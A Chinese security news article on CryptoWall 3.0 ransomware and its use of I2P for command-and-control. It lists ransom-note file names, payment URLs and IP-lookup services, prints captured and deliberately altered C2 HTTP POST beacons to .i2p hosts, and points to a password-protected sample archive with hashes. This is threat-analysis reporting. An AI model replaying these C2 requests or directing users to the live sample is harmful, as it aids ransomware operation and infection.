使用I2P匿名网络通信,又一款勒索软件CryptoWall 3.0来了

  FreeBuf已经报道过不计其数的勒索软件,而最近研究人员又发现了一款特别的——它使用I2P匿名网络进行通信,名为Cryptowall 3.0。

  一天感染288个用户

  来自法国的安全研究员Kafeine在其博客中确认了这款软件使用I2P匿名网络进行C&C通讯,在@Horgh_RCE的反编译下为我们揭开了Cryptowall 3.0的面纱。

  微软提供的数据显示从1月11日至1月12日一天时间里,Cryptowall感染了288个用户。

  相较之前的变种,软件在用于勒索的提示文件的文件名上有少许变化:

  HELP_DECRYPT.HTML

  HELP_DECRYPT.PNG

  HELP_DECRYPT.TXT

  HELP_DECRYPT.URL

  贴心的用户体验

  以下则是HELP_DECRYPT.PNG的内容:

  该款勒索软件十分贴心,HELP_DECRYPT.PNG语言版本是根据用户的IP决定的,如法国安全研究员Kafeine的HELP_DECRYPT.PNG:

  针对不同的用户,文中的链接也各不相同。以下是Kafeine提供的一组链接:

  http://paytoc4gtpn5czl2.torforall.com/1c3L59z

  http://paytoc4gtpn5czl2.torman2.com/1c3L59z

  http://paytoc4gtpn5czl2.torwoman.com/1c3L59z

  http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

  软件完成对用户文件的加密后会提示用户使用比特币支付赎金。自CoinVault之后,免费解密一个文件似乎要变成行业标准了,CryptoWall 3.0也附带了这一功能:

  软件使用以下服务获取IP:

  "http://ip-addr.es"

  "http://myexternalip.com/raw"

  "http://curlmyip.com"

  I2P协议传输

  与C&C服务器的通讯似乎是通过Rc4加密了,并且数据通过i2p协议传输:

  ————–数据稍经修改——-

  POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1

  Accept: */*

  Content-Type: application/x-www-form-urlencoded

  Pragma: no-cache

  Content-Length: 134

  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)

  Host: proxy2-2-2.i2p

  v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c

  —————数据稍经修改——-

  POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1

  Accept: */*

  Content-Type: application/x-www-form-urlencoded

  Pragma: no-cache

  Content-Length: 134

  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)

  Host: proxy1-1-1.i2p

  z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626

  ————————————————–

  经过解密后的数据:(不要尝试解密前面的数据,我们故意修改了有些十六进制数)

  z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}

  样本下载

  Cryptowall_3.0.zip,密码:infected

  文件应包含6c3e6143ab699d6b78551d417c0a1a45和47363b94cee907e2b8926c1be61150c7

上一篇:智能无惧挑战 山石网科轰动RSA2015

下一篇:微软怒了! 谷歌再次公布Windows 8.1漏洞